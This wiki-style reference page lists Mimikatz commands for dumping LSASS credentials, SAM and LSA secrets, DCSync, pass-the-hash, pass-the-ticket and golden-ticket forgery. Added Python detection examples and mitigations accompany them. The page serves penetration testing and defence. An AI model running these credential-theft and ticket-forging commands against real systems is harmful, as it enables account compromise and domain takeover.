Mimikatz

From RCATs
Latest revision as of 04:47, 21 August 2023

Description

Mimikatz[1] is a tool that is primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. Additionally, it can also be used to perform other tasks such as generating Kerberos tickets, and extracting digital certificates.

Links:

https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

Commands

sekurlsa

# Extracts logon passwords and hashes from the security support providers (SSPs) loaded in the LSASS process.
sekurlsa::logonpasswords

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export 

# Performs a pass-the-hash (PTH) logon on a Windows system: authenticates as the specified user with the provided NTLM hash and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
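Every sekurlsa command above works by opening a handle to lsass.exe and reading its memory, so that handle request is the thing a defender watches for. The following is an added example (not part of this page or of mimikatz) that flags Sysmon Event ID 10 (ProcessAccess) records where a process outside a hypothetical allowlist obtained read access to LSASS; the sample events are constructed.

```python
# Added example (not from the RCATs page or mimikatz): flag processes that read
# LSASS memory using Sysmon Event ID 10 (ProcessAccess) records.
PROCESS_VM_READ = 0x0010  # access-mask bit needed to read another process's memory

# Hypothetical allowlist of images that legitimately open LSASS; tune per estate.
KNOWN_GOOD_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

SAMPLE_EVENTS = [  # constructed Sysmon events
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1410"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},  # not a ProcessAccess event
]


def suspicious_lsass_reads(events):
    """Return (source_image, granted_access) for non-allowlisted processes that
    opened lsass.exe with a handle able to read its memory."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        mask = int(ev["GrantedAccess"], 16)
        if not mask & PROCESS_VM_READ:
            continue  # e.g. 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION only
        if ev["SourceImage"].lower() in KNOWN_GOOD_SOURCES:
            continue
        hits.append((ev["SourceImage"], mask))
    return hits


if __name__ == "__main__":
    for image, mask in suspicious_lsass_reads(SAMPLE_EVENTS):
        print(f"LSASS read by {image} (GrantedAccess=0x{mask:x})")
```

Matching on the PROCESS_VM_READ bit rather than on a fixed list of masks catches any tool that asks for memory read access, whatever other rights it bundles in. The preventive controls are LSA Protection (RunAsPPL), which denies such handles to unprotected processes, and Credential Guard, which keeps the secrets out of LSASS memory in the first place.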

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters are used to set the properties of the Golden Ticket, such as the administrator account and domain SID
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

# This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export 

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault & lsadump

# Extracts credentials from the Windows Vault.
vault::cred

# Lists the contents of the Windows Vault.
vault::list

# Impersonates a SYSTEM token, elevating the current session to Local System privileges.
token::elevate

# Reverts the current session to the privileges it had before elevation.
token::revert

# Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

# Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

# Dumps the cached domain logon credentials (MSCache) held by the LSA, which cover domain accounts that recently logged on to the host.
lsadump::cache

# Performs a DCSync attack, which uses directory replication to pull account data (including hashes) from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
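DCSync does not touch the domain controller's disk or LSASS; it asks the DC for directory replication, which the DC audits (with "Audit Directory Service Access" enabled) as Security event 4662 on the domain object carrying the replication control-access GUIDs. The following is an added example (not part of this page or of mimikatz) that picks out 4662 events where a principal other than a known DC computer account exercised those rights; the events and the DC allowlist are constructed.

```python
# Added example (not from the RCATs page or mimikatz): detect DCSync-style
# replication requests in Security event 4662 records.
import re

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DC_ACCOUNTS = {"dc01$", "dc02$"}  # hypothetical: computer accounts of the real DCs

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

SAMPLE_4662 = [  # constructed DC Security events
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "bob",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "alice",
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # ordinary object access
    {"EventID": 4663, "SubjectUserName": "bob", "Properties": ""},  # not a directory-access event
]


def dcsync_candidates(events):
    """Return (subject, sorted replication GUIDs used) for 4662 events where a
    non-DC principal exercised directory replication rights."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        used = guids & REPLICATION_GUIDS
        if not used:
            continue
        if ev["SubjectUserName"].lower() in DC_ACCOUNTS:
            continue  # normal DC-to-DC replication
        hits.append((ev["SubjectUserName"], sorted(used)))
    return hits


if __name__ == "__main__":
    for subject, guids in dcsync_candidates(SAMPLE_4662):
        print(f"replication rights used by {subject}: {', '.join(guids)}")
```

Legitimate non-DC users of these rights (Azure AD Connect service accounts, some backup products) belong in the allowlist rather than in a suppressed alert; the more durable fix is to review who holds the replication extended rights on the domain object at all.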

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts Kerberos encryption keys (ekeys), e.g. AES-128, AES-256 and RC4 keys, from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dpapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Switches sekurlsa to read from a minidump of the LSASS process instead of live memory; subsequent sekurlsa commands operate on the dump file.
sekurlsa::minidump lsass.dmp

PTT

# Impersonates a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

# Creates a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
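A forged TGT (kerberos::golden, with or without /ptt) and an injected one (kerberos::ptt above) share a property the KDC can see: the ticket never came out of an AS exchange, so the domain controller records TGS requests (event 4769) for the account without a preceding TGT issuance (event 4768) from that client. The following is an added example (not part of this page or of mimikatz) that correlates the two event types over a constructed sample; the 10-hour TGT lifetime is an assumed domain policy.

```python
# Added example (not from the RCATs page or mimikatz): flag 4769 service-ticket
# requests with no matching 4768 TGT issuance within the TGT lifetime.
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # assumed domain policy; use the real value

SAMPLE_KRB = [  # constructed DC Security events, in time order
    {"EventID": 4768, "Time": "2023-08-21T08:00:00", "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.0.21"},
    {"EventID": 4769, "Time": "2023-08-21T08:00:05", "TargetUserName": "alice@CHOCOLATE.LOCAL",
     "IpAddress": "::ffff:10.0.0.21", "ServiceName": "cifs/fs01"},
    {"EventID": 4769, "Time": "2023-08-21T09:30:00", "TargetUserName": "Administrateur@CHOCOLATE.LOCAL",
     "IpAddress": "::ffff:10.0.0.77", "ServiceName": "cifs/dc01"},
    {"EventID": 4769, "Time": "2023-08-21T09:30:02", "TargetUserName": "Administrateur@CHOCOLATE.LOCAL",
     "IpAddress": "::ffff:10.0.0.77", "ServiceName": "ldap/dc01"},
]


def normalise_account(name):
    """4768 logs the bare name, 4769 logs name@REALM; compare on the bare name."""
    return name.split("@", 1)[0].lower()


def tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """Return (account, client_ip, service, time) for 4769 events with no 4768
    for the same account and client address within `lifetime` before them."""
    last_tgt = {}  # (account, ip) -> time of the most recent TGT issuance
    hits = []
    for ev in events:  # assumes chronological order
        t = datetime.fromisoformat(ev["Time"])
        key = (normalise_account(ev["TargetUserName"]), ev["IpAddress"])
        if ev["EventID"] == 4768:
            last_tgt[key] = t
        elif ev["EventID"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or t - issued > lifetime:
                hits.append((key[0], key[1], ev["ServiceName"], ev["Time"]))
    return hits


if __name__ == "__main__":
    for account, ip, service, when in tgs_without_tgt(SAMPLE_KRB):
        print(f"{when}: {account} from {ip} requested {service} with no TGT on record")
```

This check needs events from every DC in the domain and a retention window longer than the TGT lifetime, otherwise a TGT issued by another DC or before collection started shows up as a false positive. Because a golden ticket is signed with the krbtgt key, the remediation is to reset the krbtgt password twice (the KDC honours the previous key for a grace period), which invalidates every ticket forged with the old hash or AES key.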

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge

References

1. https://github.com/ParrotSec/mimikatz